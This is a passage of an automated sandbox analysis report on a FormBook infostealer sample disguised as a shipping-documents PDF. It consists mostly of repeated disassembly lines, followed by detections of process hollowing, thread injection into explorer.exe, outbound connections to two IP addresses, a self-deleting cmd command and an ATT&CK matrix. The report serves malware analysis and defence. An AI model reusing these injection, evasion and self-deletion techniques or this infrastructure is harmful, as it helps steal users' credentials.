      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]11_2_0352A229
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532ACB mov eax, dword ptr fs:[00000030h]11_2_03532ACB
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532AE4 mov eax, dword ptr fs:[00000030h]11_2_03532AE4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353D294 mov eax, dword ptr fs:[00000030h]11_2_0353D294
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353D294 mov eax, dword ptr fs:[00000030h]11_2_0353D294
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351AAB0 mov eax, dword ptr fs:[00000030h]11_2_0351AAB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351AAB0 mov eax, dword ptr fs:[00000030h]11_2_0351AAB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353FAB0 mov eax, dword ptr fs:[00000030h]11_2_0353FAB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]11_2_035052A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]11_2_035052A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]11_2_035052A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]11_2_035052A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]11_2_035052A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352B944 mov eax, dword ptr fs:[00000030h]11_2_0352B944
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352B944 mov eax, dword ptr fs:[00000030h]11_2_0352B944
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B171 mov eax, dword ptr fs:[00000030h]11_2_0350B171
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B171 mov eax, dword ptr fs:[00000030h]11_2_0350B171
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C962 mov eax, dword ptr fs:[00000030h]11_2_0350C962
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]11_2_03509100
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]11_2_03509100
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]11_2_03509100
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353513A mov eax, dword ptr fs:[00000030h]11_2_0353513A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353513A mov eax, dword ptr fs:[00000030h]11_2_0353513A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]11_2_03524120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]11_2_03524120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]11_2_03524120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]11_2_03524120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov ecx, dword ptr fs:[00000030h]11_2_03524120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035941E8 mov eax, dword ptr fs:[00000030h]11_2_035941E8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]11_2_0350B1E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]11_2_0350B1E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]11_2_0350B1E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532990 mov eax, dword ptr fs:[00000030h]11_2_03532990
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C182 mov eax, dword ptr fs:[00000030h]11_2_0352C182
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A185 mov eax, dword ptr fs:[00000030h]11_2_0353A185
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]11_2_035851BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]11_2_035851BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]11_2_035851BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]11_2_035851BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035361A0 mov eax, dword ptr fs:[00000030h]11_2_035361A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035361A0 mov eax, dword ptr fs:[00000030h]11_2_035361A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]11_2_035C49A4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]11_2_035C49A4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]11_2_035C49A4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]11_2_035C49A4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035869A6 mov eax, dword ptr fs:[00000030h]11_2_035869A6
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03520050 mov eax, dword ptr fs:[00000030h]11_2_03520050
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03520050 mov eax, dword ptr fs:[00000030h]11_2_03520050
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D1074 mov eax, dword ptr fs:[00000030h]11_2_035D1074
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C2073 mov eax, dword ptr fs:[00000030h]11_2_035C2073
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D4015 mov eax, dword ptr fs:[00000030h]11_2_035D4015
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D4015 mov eax, dword ptr fs:[00000030h]11_2_035D4015
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]11_2_03587016
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]11_2_03587016
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]11_2_03587016
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]11_2_0351B02A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]11_2_0351B02A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]11_2_0351B02A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]11_2_0351B02A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]11_2_0353002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]11_2_0353002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]11_2_0353002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]11_2_0353002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]11_2_0353002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]11_2_0359B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov ecx, dword ptr fs:[00000030h]11_2_0359B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]11_2_0359B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]11_2_0359B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]11_2_0359B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]11_2_0359B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]11_2_035040E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]11_2_035040E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]11_2_035040E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035058EC mov eax, dword ptr fs:[00000030h]11_2_035058EC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509080 mov eax, dword ptr fs:[00000030h]11_2_03509080
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583884 mov eax, dword ptr fs:[00000030h]11_2_03583884
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583884 mov eax, dword ptr fs:[00000030h]11_2_03583884
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov ecx, dword ptr fs:[00000030h]11_2_0353F0BF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov eax, dword ptr fs:[00000030h]11_2_0353F0BF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov eax, dword ptr fs:[00000030h]11_2_0353F0BF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]11_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]11_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]11_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]11_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]11_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]11_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035490AF mov eax, dword ptr fs:[00000030h]11_2_035490AF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351EF40 mov eax, dword ptr fs:[00000030h]11_2_0351EF40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351FF60 mov eax, dword ptr fs:[00000030h]11_2_0351FF60
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8F6A mov eax, dword ptr fs:[00000030h]11_2_035D8F6A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352F716 mov eax, dword ptr fs:[00000030h]11_2_0352F716
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FF10 mov eax, dword ptr fs:[00000030h]11_2_0359FF10
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FF10 mov eax, dword ptr fs:[00000030h]11_2_0359FF10
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D070D mov eax, dword ptr fs:[00000030h]11_2_035D070D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D070D mov eax, dword ptr fs:[00000030h]11_2_035D070D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A70E mov eax, dword ptr fs:[00000030h]11_2_0353A70E
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A70E mov eax, dword ptr fs:[00000030h]11_2_0353A70E
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353E730 mov eax, dword ptr fs:[00000030h]11_2_0353E730
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03504F2E mov eax, dword ptr fs:[00000030h]11_2_03504F2E
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03504F2E mov eax, dword ptr fs:[00000030h]11_2_03504F2E
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035437F5 mov eax, dword ptr fs:[00000030h]11_2_035437F5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03518794 mov eax, dword ptr fs:[00000030h]11_2_03518794
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]11_2_03587794
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]11_2_03587794
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]11_2_03587794
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]11_2_03517E41
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]11_2_03517E41
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]11_2_03517E41
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]11_2_03517E41
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]11_2_03517E41
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]11_2_03517E41
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAE44 mov eax, dword ptr fs:[00000030h]11_2_035CAE44
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAE44 mov eax, dword ptr fs:[00000030h]11_2_035CAE44
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]11_2_0352AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]11_2_0352AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]11_2_0352AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]11_2_0352AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]11_2_0352AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351766D mov eax, dword ptr fs:[00000030h]11_2_0351766D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A61C mov eax, dword ptr fs:[00000030h]11_2_0353A61C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A61C mov eax, dword ptr fs:[00000030h]11_2_0353A61C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]11_2_0350C600
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]11_2_0350C600
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]11_2_0350C600
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03538E00 mov eax, dword ptr fs:[00000030h]11_2_03538E00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C1608 mov eax, dword ptr fs:[00000030h]11_2_035C1608
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BFE3F mov eax, dword ptr fs:[00000030h]11_2_035BFE3F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350E620 mov eax, dword ptr fs:[00000030h]11_2_0350E620
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8ED6 mov eax, dword ptr fs:[00000030h]11_2_035D8ED6
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03548EC7 mov eax, dword ptr fs:[00000030h]11_2_03548EC7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BFEC0 mov eax, dword ptr fs:[00000030h]11_2_035BFEC0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035336CC mov eax, dword ptr fs:[00000030h]11_2_035336CC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035316E0 mov ecx, dword ptr fs:[00000030h]11_2_035316E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035176E2 mov eax, dword ptr fs:[00000030h]11_2_035176E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FE87 mov eax, dword ptr fs:[00000030h]11_2_0359FE87
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]11_2_035D0EA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]11_2_035D0EA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]11_2_035D0EA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035846A7 mov eax, dword ptr fs:[00000030h]11_2_035846A7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03527D50 mov eax, dword ptr fs:[00000030h]11_2_03527D50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03543D43 mov eax, dword ptr fs:[00000030h]11_2_03543D43
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583540 mov eax, dword ptr fs:[00000030h]11_2_03583540
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035B3D40 mov eax, dword ptr fs:[00000030h]11_2_035B3D40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C577 mov eax, dword ptr fs:[00000030h]11_2_0352C577
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C577 mov eax, dword ptr fs:[00000030h]11_2_0352C577
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350AD30 mov eax, dword ptr fs:[00000030h]11_2_0350AD30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]11_2_03513D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CE539 mov eax, dword ptr fs:[00000030h]11_2_035CE539
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]11_2_03534D3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]11_2_03534D3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]11_2_03534D3B
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632C6 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,1_2_005632C6
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,1_2_005632D1

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 68.70.163.36 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 156.224.66.93 80Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread register set: target process: 3388Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3388Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: C90000Jump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'Jump to behavior
      Source: explorer.exe, 00000003.00000002.485221215.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000003.00000002.500202278.0000000006860000.00000004.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F1083 cpuid 0_2_020F1083
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeQueries volume information: C:\ VolumeInformationJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: wlanext.exe PID: 5896, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery721Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22Input Capture1Virtualization/Sandbox Evasion22Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Information Discovery321SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
